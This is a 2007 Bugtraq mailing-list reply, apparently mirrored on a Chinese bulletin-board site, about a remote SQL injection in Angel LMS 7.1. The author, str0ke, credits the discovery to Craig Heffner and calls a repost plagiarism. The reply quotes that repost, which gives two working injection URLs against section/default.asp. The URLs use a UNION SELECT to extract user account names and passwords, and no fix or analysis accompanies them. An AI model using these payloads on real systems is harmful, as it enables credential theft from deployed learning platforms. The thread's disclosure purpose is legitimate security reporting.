Re: Angel LMS 7.1 - Remote SQL Injection

看板Bugtraq作者str0ke.時間19年前 (2007/03/02 05:48)推噓0(0推 0噓 0→)

留言0則, 0人參與討論串2/2 (看更多)

# Credit: # Exploit discovered by Craig Heffner # heffnercj [at] gmail.com # http://www.craigheffner.com http://www.milw0rm.com/exploits/3390 Plagiarism sucks. /str0ke On 1 Mar 2007 16:06:06 -0000, Guns@inbox.com <Guns@inbox.com> wrote: > # Angel LMS 7.1 Remote SQL Injection > # by Guns > > #All User Accounts# > http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20accounts--" > > #Account Passwords# > http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20password%20from%20accounts--" >

‣ 返回看板[ Bugtraq ] 臭蟲

‣ 更多 str0ke. 的文章

文章代碼(AID): #15vqeG00 (Bugtraq)

討論串 (同標題文章)

完整討論串 (本文為第 2 之 2 篇)：

排序：最新先 | 最舊先 | 留言數

Re: Angel LMS 7.1 - Remote SQL Injection Re: Angel LMS 7.1 - Remote SQL Injection

str0ke.

19年前, 03/02

Angel LMS 7.1 - Remote SQL Injection Angel LMS 7.1 - Remote SQL Injection

19年前, 03/02

文章代碼(AID): #15vqeG00 (Bugtraq)